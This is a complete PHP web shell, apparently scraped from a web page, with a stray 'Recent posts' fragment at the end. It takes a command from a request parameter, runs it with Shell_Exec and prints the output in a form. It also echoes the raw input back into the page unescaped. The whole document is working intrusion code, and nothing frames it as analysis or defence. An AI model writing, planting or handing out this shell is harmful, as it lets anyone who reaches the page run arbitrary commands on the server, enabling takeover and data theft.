<? $cmd= $_REQUEST["-cmd"]; ?>
\
<? $cmd=str_replace(";;","\\",$cmd); ?>
\
<html><title><?=$cmd?></title><body onLoad="document.forms[0].elements[-cmd].focus()">
\
<form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
\
<hr><pre> <? if($cmd !="") print Shell_Exec($cmd); ?></pre></form></body></html>
\

+ Recent posts